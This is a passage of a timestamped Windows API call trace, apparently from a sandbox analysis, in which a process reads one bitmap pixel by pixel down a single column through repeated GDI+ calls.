[0164.360] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=78, color=0x19de90) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=79, color=0x19de90) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=80, color=0x19de90) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=81, color=0x19de90) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=82, color=0x19de90) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.361] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=83, color=0x19de90) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=84, color=0x19de90) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=85, color=0x19de90) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=86, color=0x19de90) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=87, color=0x19de90) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=88, color=0x19de90) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.361] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.361] GetLastError () returned 0x57
[0164.362] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=89, color=0x19de90) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=90, color=0x19de90) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=91, color=0x19de90) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=92, color=0x19de90) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=93, color=0x19de90) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=94, color=0x19de90) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=95, color=0x19de90) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.362] GetLastError () returned 0x57
[0164.362] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=96, color=0x19de90) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=97, color=0x19de90) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=98, color=0x19de90) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=99, color=0x19de90) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=100, color=0x19de90) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=101, color=0x19de90) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.363] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.363] GetLastError () returned 0x57
[0164.364] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=102, color=0x19de90) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=103, color=0x19de90) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=104, color=0x19de90) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=105, color=0x19de90) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=106, color=0x19de90) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.364] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.364] GetLastError () returned 0x57
[0164.365] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=107, color=0x19de90) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=108, color=0x19de90) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=109, color=0x19de90) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=110, color=0x19de90) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=111, color=0x19de90) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.365] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=112, color=0x19de90) returned 0x0
[0164.365] GetLastError () returned 0x57
[0164.366] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=113, color=0x19de90) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=114, color=0x19de90) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=115, color=0x19de90) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=116, color=0x19de90) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.366] GetLastError () returned 0x57
[0164.366] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=117, color=0x19de90) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=118, color=0x19de90) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=119, color=0x19de90) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=120, color=0x19de90) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=121, color=0x19de90) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=122, color=0x19de90) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.367] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.367] GetLastError () returned 0x57
[0164.368] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.368] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=123, color=0x19de90) returned 0x0
[0164.368] GetLastError () returned 0x57
[0164.368] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.368] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.368] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=124, color=0x19de90) returned 0x0
[0164.368] GetLastError () returned 0x57
[0164.368] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.368] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.368] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=125, color=0x19de90) returned 0x0
[0164.368] GetLastError () returned 0x57
[0164.368] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.368] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.368] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=126, color=0x19de90) returned 0x0
[0164.368] GetLastError () returned 0x57
[0164.368] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.368] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.369] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=127, color=0x19de90) returned 0x0
[0164.369] GetLastError () returned 0x57
[0164.369] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.369] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.369] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=128, color=0x19de90) returned 0x0
[0164.369] GetLastError () returned 0x57
[0164.369] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.369] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.369] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=129, color=0x19de90) returned 0x0
[0164.369] GetLastError () returned 0x57
[0164.369] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.369] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.369] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=130, color=0x19de90) returned 0x0
[0164.369] GetLastError () returned 0x57
[0164.369] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.369] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.369] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=131, color=0x19de90) returned 0x0
[0164.369] GetLastError () returned 0x57
[0164.369] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.369] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.369] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=132, color=0x19de90) returned 0x0
[0164.370] GetLastError () returned 0x57
[0164.370] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.370] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.370] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=133, color=0x19de90) returned 0x0
[0164.370] GetLastError () returned 0x57
[0164.370] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.370] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.370] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=134, color=0x19de90) returned 0x0
[0164.370] GetLastError () returned 0x57
[0164.370] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.370] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.370] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=135, color=0x19de90) returned 0x0
[0164.370] GetLastError () returned 0x57
[0164.370] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.370] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.370] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=136, color=0x19de90) returned 0x0
[0164.370] GetLastError () returned 0x57
[0164.370] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.370] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.371] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=137, color=0x19de90) returned 0x0
[0164.371] GetLastError () returned 0x57
[0164.371] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.371] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.371] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=138, color=0x19de90) returned 0x0
[0164.371] GetLastError () returned 0x57
[0164.371] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.371] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.371] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=139, color=0x19de90) returned 0x0
[0164.371] GetLastError () returned 0x57
[0164.371] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.371] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.371] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=140, color=0x19de90) returned 0x0
[0164.371] GetLastError () returned 0x57
[0164.371] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.371] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.371] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=141, color=0x19de90) returned 0x0
[0164.371] GetLastError () returned 0x57
[0164.371] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.372] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.372] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=142, color=0x19de90) returned 0x0
[0164.372] GetLastError () returned 0x57
[0164.372] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.372] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.372] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=143, color=0x19de90) returned 0x0
[0164.372] GetLastError () returned 0x57
[0164.372] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.372] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.372] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=144, color=0x19de90) returned 0x0
[0164.372] GetLastError () returned 0x57
[0164.372] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.372] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.372] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=145, color=0x19de90) returned 0x0
[0164.372] GetLastError () returned 0x57
[0164.372] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.372] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.372] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=146, color=0x19de90) returned 0x0
[0164.372] GetLastError () returned 0x57
[0164.373] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.373] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.373] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=147, color=0x19de90) returned 0x0
[0164.373] GetLastError () returned 0x57
[0164.373] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.373] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.373] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=148, color=0x19de90) returned 0x0
[0164.373] GetLastError () returned 0x57
[0164.373] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.373] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.373] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=149, color=0x19de90) returned 0x0
[0164.373] GetLastError () returned 0x57
[0164.373] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.373] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.373] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=150, color=0x19de90) returned 0x0
[0164.373] GetLastError () returned 0x57
[0164.373] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.373] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.373] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=151, color=0x19de90) returned 0x0
[0164.373] GetLastError () returned 0x57
[0164.374] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.374] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.374] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=152, color=0x19de90) returned 0x0
[0164.374] GetLastError () returned 0x57
[0164.374] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.374] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.374] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=153, color=0x19de90) returned 0x0
[0164.374] GetLastError () returned 0x57
[0164.374] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.374] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.374] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=154, color=0x19de90) returned 0x0
[0164.374] GetLastError () returned 0x57
[0164.374] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.375] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.375] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=155, color=0x19de90) returned 0x0
[0164.375] GetLastError () returned 0x57
[0164.375] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.375] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.375] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=156, color=0x19de90) returned 0x0
[0164.375] GetLastError () returned 0x57
[0164.375] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.375] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.375] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=157, color=0x19de90) returned 0x0
[0164.375] GetLastError () returned 0x57
[0164.375] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.375] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.375] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=158, color=0x19de90) returned 0x0
[0164.375] GetLastError () returned 0x57
[0164.375] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.375] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.375] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=159, color=0x19de90) returned 0x0
[0164.375] GetLastError () returned 0x57
[0164.375] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.376] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.376] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=160, color=0x19de90) returned 0x0
[0164.376] GetLastError () returned 0x57
[0164.376] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.376] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.376] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=161, color=0x19de90) returned 0x0
[0164.376] GetLastError () returned 0x57
[0164.376] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.376] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.376] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=162, color=0x19de90) returned 0x0
[0164.376] GetLastError () returned 0x57
[0164.376] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.376] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.376] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=163, color=0x19de90) returned 0x0
[0164.376] GetLastError () returned 0x57
[0164.376] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
